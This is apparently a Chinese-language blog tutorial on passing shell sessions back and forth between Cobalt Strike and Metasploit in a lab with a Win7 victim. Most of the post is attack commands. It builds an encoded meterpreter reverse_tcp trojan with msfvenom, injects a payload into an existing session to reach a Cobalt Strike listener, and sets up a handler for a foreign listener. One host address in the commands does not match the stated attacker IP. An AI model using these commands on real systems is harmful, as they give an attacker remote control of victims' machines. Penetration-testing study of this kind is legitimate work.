cobalt strike和metasploit结合使用(互相传递shell会话

cobalt strike和metasploit结合使用(互相传递shell会话

攻击机 192.168.5.173 装有msf和cs

受害机 192.168.5.179 win7  

 

0x01 msf 派生 shell 给 Cobalt strike

Msfvenom生成木马上线:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.10 LPORT=4444 -f exe > test.exe

cobalt strike和metasploit结合使用(互相传递shell会话_第1张图片

开启cs

cobalt strike和metasploit结合使用(互相传递shell会话_第2张图片

msf exploit(handler) >  use exploit/windows/local/payload_inject
  msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
  msf exploit(payload_inject) > set DisablePayloadHandler true
  msf exploit(payload_inject) > set LHOST 192.168.5.173
msf exploit(payload_inject) > set LPORT 50050
  msf exploit(payload_inject) > set SESSION 1
  msf exploit(payload_inject) > exploit

cobalt strike和metasploit结合使用(互相传递shell会话_第3张图片

0x02 Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.5.10

lhost => 192.168.5.10

msf exploit(handler) > set lport 4444

lport =>4444

msf exploit(handler) > exploit

cobalt strike和metasploit结合使用(互相传递shell会话_第4张图片

之后使用Cobalt Strike创建一个

windows/foreign/reverse_tcp Listener

cobalt strike和metasploit结合使用(互相传递shell会话_第5张图片

cobalt strike和metasploit结合使用(互相传递shell会话_第6张图片

 

 

 

 

posted @ 2019-05-27 22:08 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,权限提升)